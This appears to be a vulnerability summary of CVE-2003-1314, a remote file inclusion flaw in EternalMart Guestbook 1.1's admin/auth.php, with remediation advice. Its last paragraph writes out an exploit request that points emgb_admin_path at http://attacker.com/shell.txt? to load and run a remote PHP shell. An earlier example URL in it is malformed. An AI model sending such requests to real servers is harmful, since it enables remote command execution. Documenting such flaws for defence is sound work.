CVE-2003-1314

An attacker sends an HTTP request to `admin/auth.php` with the `emgb_admin_path` parameter set to a URL pointing to a remote PHP shell (e.g., `http://mdxshell.txt?`). The vulnerable `include()` statement then loads and executes the attacker's remote file as PHP code, allowing arbitrary command execution on the server [ref_id=1]. No authentication is required, and the only precondition is that the PHP configuration allows remote file inclusion via `allow_url_include`.

The vulnerable file is `admin/auth.php` in EternalMart Guestbook (EMGB) 1.1. The code contains the line `include("$emgb_admin_path/auth_func.php")`, which directly uses the attacker-controlled `emgb_admin_path` parameter without sanitization [ref_id=1].

No patch is provided in the bundle. The advisory does not specify a fix, but the remediation would be to avoid passing user-supplied input directly into an `include()` statement. Developers should use a whitelist of allowed paths or define `$emgb_admin_path` internally rather than accepting it from the `$_GET` or `$_REQUEST` superglobals.

Send a crafted HTTP GET request to the vulnerable application: `http://target.com/[path]/admin/auth.php?emgb_admin_path=http://attacker.com/shell.txt?` [ref_id=1]. The trailing `?` prevents the appended `/auth_func.php` from being interpreted as part of the remote URL. If successful, the remote PHP code is executed on the target server.